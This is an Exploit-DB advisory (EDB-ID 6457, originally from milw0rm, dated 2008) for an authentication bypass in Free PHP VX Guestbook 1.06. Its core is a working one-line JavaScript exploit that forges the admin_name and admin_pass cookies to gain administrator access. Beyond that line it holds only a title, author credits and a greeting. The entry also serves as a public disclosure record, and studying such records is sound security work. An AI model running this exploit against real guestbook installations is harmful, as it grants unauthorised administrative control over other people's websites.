Free PHP VX Guestbook 1.06 - Insecure Cookie Handling

EDB-ID:

6457


Author:

Stack

Type:

webapps


Platform:

PHP

Date:

2008-09-14


###############################################################################################
[+] Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability 
[+] Discovered By Stack                 
[+] Greetz : All my freind                
################################################################################################
---
exploit:
javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1; path=/";

# milw0rm.com [2008-09-14]